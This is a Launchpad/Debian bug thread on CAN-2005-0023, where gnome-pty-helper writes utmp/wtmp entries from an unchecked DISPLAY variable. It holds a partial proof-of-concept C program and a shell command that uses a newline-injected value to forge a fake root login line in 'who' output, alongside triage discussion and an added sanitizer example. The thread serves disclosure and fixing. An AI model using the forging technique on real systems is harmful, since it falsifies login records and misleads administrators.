[CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Bug #22887 reported by Debian Bug Importer
Affects: libzvt (Ubuntu) | Status: Won't Fix | Importance: Low | Assigned to: Unassigned
Steve Langasek (vorlon) wrote: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole

> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

Why is this filed at severity: critical? What is the attack vector here
which permits root privilege escalation?

--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
<email address hidden> http://www.debian.org/

Paul Szabo (psz-maths) wrote:

Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical? What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-pty-helper.)

Cheers, Paul

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Steve Langasek (vorlon) wrote:

On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.

> > Why is this filed at severity: critical? What is the attack vector here
> > which permits root privilege escalation?

> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)

Hmm... After rereading the definition at
<http://www.debian.org/Bugs/Developer#severities>, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
<email address hidden> http://www.debian.org/

Loïc Minier (lool) wrote:

        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

--
Loïc Minier <email address hidden>

Paul Szabo (psz-maths) wrote:

Dear Loic,

> Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am I sure if this is serious
enough to deserve one.)

> Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

> Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Loïc Minier (lool) wrote:

On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is serious
> enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

> > Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 equivalent of libzvt2, you can grab it from:
    <http://packages.debian.org/>
 the source package for this library is "vte".

 It'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too. Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

--
Loïc Minier <email address hidden>

Paul Szabo (psz-maths) wrote:

Dear Loic,

>> > Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 equivalent of libzvt2 ...
> It'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too. Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs
 display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Matt Zimmerman (mdz) wrote: CVE name

retitle 329156 [CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
thanks

Use CAN-2005-0023 for this issue.

--
 - mdz

Thomas Bushnell BSG (tb-becket) wrote: help needed

tags 329156 +help
thanks

Moritz Mühlenhoff (muehlenhoff) wrote: foo

tag 329156 security
thanks
--
Moritz Muehlenhoff <email address hidden> fon: +49 421 22 232- 0
Development Linux for Your Business fax: +49 421 22 232-99
Univention GmbH http://www.univention.de/ mobil: +49 175 22 999 23

Loïc Minier (lool) wrote: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 This vulnerability is identified as CAN-2005-0023. The upstream
 developers of vte have been notified of the bug at:
    <http://bugzilla.gnome.org/show_bug.cgi?id=317312>

     Bye,
--
Loïc Minier <email address hidden>

Debian Bug Importer (debzilla) wrote:

Automatically imported from Debian bug report #330907 http://bugs.debian.org/330907

Debian Bug Importer (debzilla) wrote:

Message-Id: <email address hidden>
Date: Tue, 20 Sep 2005 09:01:20 +1000
From: Paul Szabo <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole

gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

OUTPUT:

psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2 Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2 Sep 20 08:40 (xyz)
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ? S 08:14 0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz 31444 0.0 0.0 1484 380 pts/1 S 08:21 0:00 gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1 S 08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1 R+ 08:21 0:00 ps aux
[1]+ Done gnome-pty-helper-exploit xyz
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)

CODE:

/*
    Must be compiled against (within)
 gnome-libs-1.4.2/zvt
    because it uses *.h files from there.
    Code "stolen" from subshell.c .
*/

#include <sys/types.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
 struct iovec iov [1];
 struct msghdr msg;
 char buf [32];

 iov [0].iov_base = buf;
 iov [0].iov_len = sizeof (buf);
 msg.msg_iov = iov;
 msg.msg_iovlen = 1;
 msg.msg_name = NULL;
 msg.msg_namelen = 0;

 if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
  return -1;
 msg.msg_control = (caddr_t) cmptr;
 msg.msg_controllen = CONTROLLEN;

 if (recvmsg (helper_fd, &msg, 0) <= 0)
  return -1;

 return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
 return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
 GnomePtyOps op;
 int result, n;
 void *tag;

 if (helper_pid == -1)
  return NULL;

 if (helper_pid == 0){
  if (s_pipe (help...

Loïc Minier (lool) wrote: Re: gnome-pty-helper foo

# downgrading the clone too
severity 330907 normal
thanks

On ven, oct 07, 2005, Martin Schulze wrote:
> severity 329156 normal
> thanks dude
>
> Loïc Minier wrote:
> > Hi,
> >
> > On Fri, Oct 07, 2005, Martin Schulze wrote:
> > > Could somebody explain the security implication for me?
> >
> > You can record in the utmp/wtmp logs something which is wrong, for
> > example that a user is currently connected to a display while he
> > isn't. I'm not the one to argue with though.
>
> Ok, so unless somebody proves us wrong we don't consider this a
> security problem.
>
> Regards,
>
> Joey
>
> --
> Everybody talks about it, but nobody does anything about it! -- Mark Twain
>
> Please always Cc to me when replying to me on the lists.
>

--
Loïc Minier <email address hidden>

Paul Szabo (psz-maths) wrote:

I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wtmp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; and expect that

psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
psz@savona:~$

should suitably freak them out.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
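The two findings in this thread (DISPLAY copied straight from the environment into the record, and a newline inside it producing a forged "who" line) describe the input check the helper lacked. The C below is an added example, not code from gnome-pty-helper or the vte project; sanitize_display and display_ok are hypothetical names, and it assumes a 256-byte ut_host (glibc's UT_HOSTSIZE) and that only values shaped like [host]:number[.number] should ever be recorded.

```c
/*
 * Added example, not code from gnome-pty-helper or the vte project.
 * Assumptions: ut_host holds 256 bytes (glibc's UT_HOSTSIZE), and a
 * DISPLAY value is recorded only when it looks like [host]:number[.number].
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define HOST_SIZE 256   /* assumed ut_host size; glibc's UT_HOSTSIZE is 256 */

/* True if the first n bytes of s are all ASCII digits and n > 0. */
static int all_digits(const char *s, size_t n)
{
    size_t i;
    if (n == 0)
        return 0;
    for (i = 0; i < n; i++)
        if (!isdigit((unsigned char)s[i]))
            return 0;
    return 1;
}

/*
 * Check a DISPLAY string before it is copied into a utmp/wtmp ut_host.
 * Returns 1 and copies the value into out when acceptable, 0 otherwise.
 * Rejected: NULL or empty input, anything too long for ut_host or out,
 * any byte outside printable ASCII (a '\n' is what makes "who" print a
 * second, forged line), spaces and parentheses (they mimic who's "(host)"
 * column), and a part after the last ':' that is not N or N.M.
 */
int sanitize_display(const char *display, char *out, size_t outlen)
{
    size_t len, i;
    const char *colon, *dot;

    if (display == NULL || out == NULL || outlen == 0)
        return 0;
    len = strlen(display);
    if (len == 0 || len >= outlen || len >= HOST_SIZE)
        return 0;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)display[i];
        if (c > 0x7e || !isprint(c) || c == ' ' || c == '(' || c == ')')
            return 0;
    }

    colon = strrchr(display, ':');      /* last colon: the display number */
    if (colon == NULL)
        return 0;
    dot = strchr(colon + 1, '.');
    if (dot == NULL) {
        if (!all_digits(colon + 1, strlen(colon + 1)))
            return 0;
    } else if (!all_digits(colon + 1, (size_t)(dot - colon - 1)) ||
               !all_digits(dot + 1, strlen(dot + 1))) {
        return 0;
    }

    memcpy(out, display, len + 1);
    return 1;
}

/* Convenience wrapper: would this DISPLAY value be recorded at all? */
int display_ok(const char *display)
{
    char host[HOST_SIZE];
    return sanitize_display(display, host, sizeof host);
}

int main(void)
{
    /* Constructed inputs: the hosts from the bug's demo output and the
     * newline-injected value from the later comment. */
    const char *samples[] = {
        "y622.yt.maths.usyd.edu.au:0.0",
        "xyz",
        "XX)\nroot tty01 Jan 01 02:03 (insecure.com",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu: %s\n", i, display_ok(samples[i]) ? "recorded" : "rejected");
    return 0;
}
```

The same predicate applied while reading wtmp flags records whose host field could only have been written by a helper that skipped this check.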

Martin Pitt (pitti) wrote:

downgrading, as per Debian discussion

Martin Pitt (pitti) wrote:

add upstream bug to URL line

Changed in vte:
status: Unconfirmed → Confirmed
Changed in vte:
status: Unconfirmed → Confirmed
Martin Pitt (pitti)
Changed in vte:
assignee: pitti → nobody
Paul Szabo (psz-maths) wrote:

On 12 Oct 2005 (a long time ago!) I wrote:

> I have not yet found any uses for utmp/wtmp ...

I found a (wrongful) use for it recently, /bin/login relies on ut_line
and chowns that to the user, see

  http://bugs.debian.org/505271

That is "not this bug", as this allows us to fake ut_host only...

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Marco Rodrigues (gothicx-sapo) wrote: Reassigning bugs from libvte4 to vte

reassign 330907 vte
reassign 144904 vte
reassign 276575 vte
reassign 143604 vte
thanks

The libvte4 package has been removed from Debian. We are reassigning
its bugs to the vte package. Please have a look at them,
and close them if they don't apply to vte anymore.

Don't hesitate to reply to this mail if you have any question.

Kind regards,
--
Marco Rodrigues

Changed in vte (Ubuntu):
importance: Medium → Low
Changed in vte (Ubuntu):
status: Confirmed → Triaged
rusivi2 (rusivi2-deactivatedaccount) wrote:

Thank you for posting this bug.

Does this occur in Lucid?

Changed in vte (Ubuntu):
status: Triaged → Incomplete
Changed in vte:
importance: Unknown → High
Changed in vte (Ubuntu):
status: Incomplete → Triaged
Jamie Strandboge (jdstrand) wrote:

Marking this 5.5 year old bug as "Won't Fix" for the Ubuntu task. If upstream or Debian has a fix, please reopen.

Changed in vte (Ubuntu):
status: Triaged → Won't Fix
Changed in vte:
importance: High → Undecided
status: Confirmed → New
importance: Undecided → Unknown
status: New → Unknown
Changed in vte:
importance: Unknown → High
status: Unknown → Confirmed
Mathew Hodson (mhodson)
information type: Public → Public Security
Mathew Hodson (mhodson)
affects: vte (Ubuntu) → libzvt (Ubuntu)
Mathew Hodson (mhodson)
Changed in vte (Debian):
status: Confirmed → Unknown
Mathew Hodson (mhodson)
affects: vte → ubuntu
no longer affects: ubuntu
Mathew Hodson (mhodson)
affects: vte (Debian) → ubuntu
Changed in ubuntu:
importance: Unknown → Undecided
status: Unknown → New
no longer affects: ubuntu